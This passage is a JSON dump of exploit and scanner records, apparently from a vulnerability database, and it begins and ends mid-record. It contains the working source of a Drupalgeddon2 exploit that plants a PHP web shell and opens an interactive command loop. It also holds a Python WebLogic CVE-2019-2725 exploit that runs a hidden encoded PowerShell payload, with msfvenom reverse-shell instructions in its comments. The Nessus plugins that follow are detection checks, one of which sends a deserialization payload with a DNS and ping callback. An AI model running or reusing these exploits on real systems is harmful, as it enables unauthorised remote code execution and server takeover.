\"\" : \"?q=\"\nurl = \"#{$target}#{$form}\"\n\nputs action(\"Testing: Clean URLs\")\nresponse = http_request(url, 'get', '', $session_cookie)\nif response.code == \"200\" and not response.body.empty?\n puts success(\"Result : Clean URLs enabled\")\nelse\n $clean_url = \"?q=\"\n puts warning(\"Result : Clean URLs disabled (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n\n # Drupal v8.x needs it to be enabled\n if $drupalverion.start_with?(\"8\")\n puts error(\"Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE\")\n exit\n elsif $drupalverion.start_with?(\"7\")\n puts info(\"Isn't an issue for Drupal v7.x\")\n end\nend\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Values in gen_evil_url for Drupal v8.x\nelementsv8 = [\n \"mail\",\n \"timezone\",\n]\n# Values in gen_evil_url for Drupal v7.x\nelementsv7 = [\n \"name\",\n]\n\nelements = $drupalverion.start_with?(\"8\") ? elementsv8 : elementsv7\n\nelements.each do|e|\n $element = e\n\n # Make a request, testing code execution\n puts action(\"Testing: Code Execution (Method: #{$element})\")\n\n # Generate a random string to see if we can echo it\n random = (0...8).map { (65 + rand(26)).chr }.join\n url, payload = gen_evil_url(\"echo #{random}\", e)\n\n response = http_request(url, \"post\", payload, $session_cookie)\n if (response.code == \"200\" or response.code == \"500\") and not response.body.empty?\n result = clean_result(response.body)\n if not result.empty?\n puts success(\"Result : #{result}\")\n\n if response.body.match(/#{random}/)\n puts success(\"Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\")\n break\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result\")\n end\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... 
Didn't detect any INJECTED output (disabled PHP function?)\")\n end\n\n puts warning(\"WARNING: Target MIGHT be exploitable [5]... Blind attack?\") if response.code == \"500\"\n\n puts verbose(\"response.body: #{response.body}\") if $verbose\n puts verbose(\"clean_result: #{result}\") if not result.empty? and $verbose\n\n elsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\n\n else\n puts error(\"Target is NOT exploitable [1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n exit\n end\n\n puts \"- \"*40 if e != elements.last\nend\n\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Location of web shell & used to signal if using PHP shell\nwebshellpath = \"\"\nprompt = \"drupalgeddon2\"\n\n# Possibles paths to try\npaths = [\n # Web root\n \"\",\n # Required for setup\n \"sites/default/\",\n \"sites/default/files/\",\n # They did something \"wrong\", chmod -R 0777 .\n #\"core/\",\n]\n# Check all (if doing web shell)\npaths.each do|path|\n # Check to see if there is already a file there\n puts action(\"Testing: Existing file (#{$target}#{path}#{webshell})\")\n\n response = http_request(\"#{$target}#{path}#{webshell}\", 'get', '', $session_cookie)\n if response.code == \"200\"\n puts warning(\"Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***\")\n else\n puts info(\"Response: HTTP #{response.code} // Size: #{response.size}\")\n end\n\n puts \"- \"*40\n\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n folder = path.empty? ? 
\"./\" : path\n puts action(\"Testing: Writing To Web Root (#{folder})\")\n\n # Merge locations\n webshellpath = \"#{path}#{webshell}\"\n\n # Final command to execute\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\n\n # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess\n # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess\n if path == \"sites/default/files/\"\n puts action(\"Moving : ./sites/default/files/.htaccess\")\n cmd = \"mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}\"\n end\n\n # Generate evil URLs\n url, payload = gen_evil_url(cmd, $element)\n # Make the request\n response = http_request(url, \"post\", payload, $session_cookie)\n # Check result\n if response.code == \"200\" and not response.body.empty?\n # Feedback\n result = clean_result(response.body)\n puts success(\"Result : #{result}\") if not result.empty?\n\n # Test to see if backdoor is there (if we managed to write it)\n response = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=hostname\", $session_cookie)\n if response.code == \"200\" and not response.body.empty?\n puts success(\"Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [2-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n elsif response.code == \"500\" and not response.body.empty?\n puts warning(\"Target MAY of been exploited... 
Bit of blind leading the blind\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [1-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n webshellpath = \"\"\n\n puts \"- \"*40 if path != paths.last\nend if try_phpshell\n\n# If a web path was set, we exploited using PHP!\nif not webshellpath.empty?\n # Get hostname for the prompt\n prompt = response.body.to_s.strip if response.code == \"200\" and not response.body.empty?\n\n puts \"-\"*80\n puts info(\"Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'\")\n# Should we be trying to call commands via PHP?\nelsif try_phpshell\n puts warning(\"FAILED : Couldn't find a writeable web path\")\n puts \"-\"*80\n puts action(\"Dropping back to direct OS commands\")\nend\n\n\n# Stop any CTRL + C action ;)\ntrap(\"INT\", \"SIG_IGN\")\n\n\n# Forever loop\nloop do\n # Default value\n result = \"~ERROR~\"\n\n # Get input\n command = Readline.readline(\"#{prompt}>> \", true).to_s\n\n # Check input\n puts warning(\"WARNING: Detected an known bad character (>)\") if command =~ />/\n\n # Exit\n break if command == \"exit\"\n\n # Blank link?\n next if command.empty?\n\n # If PHP web shell\n if not webshellpath.empty?\n # Send request\n result = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=#{command}\", $session_cookie).body\n # Direct OS commands\n else\n url, payload = gen_evil_url(command, $element, true)\n response = http_request(url, \"post\", payload, $session_cookie)\n\n # 
Check result\n if not response.body.empty?\n result = clean_result(response.body)\n end\n end\n\n # Feedback\n puts result\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-30T00:00:00", "title": "Oracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-04-30T00:00:00", "id": "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "href": "", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\n# Date: 30/04/2019\n# Exploit Author: Avinash Kumar Thapa\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\n# Tested on:\n\t#OS: Windows 2012 R2 (Build 9600).\n\t#Architecture : 
x64\n\t#System Language : en_US\n\n\n# CVE : CVE-2019-2725\n\n\n# Script Usage:\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\n# Add the powershell command in the variable\n\n__author__ = \"Avinash Kumar Thapa\"\n__description__ = \"\"\"\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\n\nCREDIT STATEMENT:\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\n\nBadcode of Knownsec 404 Team: CVE-2019-2725\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\nZengShuai Hao: CVE-2019-2725\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\n\n\"\"\"\n\nimport requests\nimport sys\n\nprint \"Exploit Written by Avinash Kumar Thapa\"\n\n\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 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\"\n\nurl = sys.argv[1]\n\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" 
xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\nresponse = requests.post(url, headers=request_headers, data=data)\nprint \"status_code:%s\" % str(response.status_code)\nprint(response)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-07-17T16:28:58", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. 
An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "Oracle WebLogic WSAT Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. 
An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... 
although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 
and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. 
The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.\n\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-01T00:00:00", "type": "nessus", "title": "Atlassian Confluence Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-08T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112944", "href": "https://www.tenable.com/plugins/was/112944", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:36:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.11.6 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112963", "href": "https://www.tenable.com/plugins/was/112963", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-23T14:50:43", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:18", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.11 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112962", "href": "https://www.tenable.com/plugins/was/112962", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:17", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
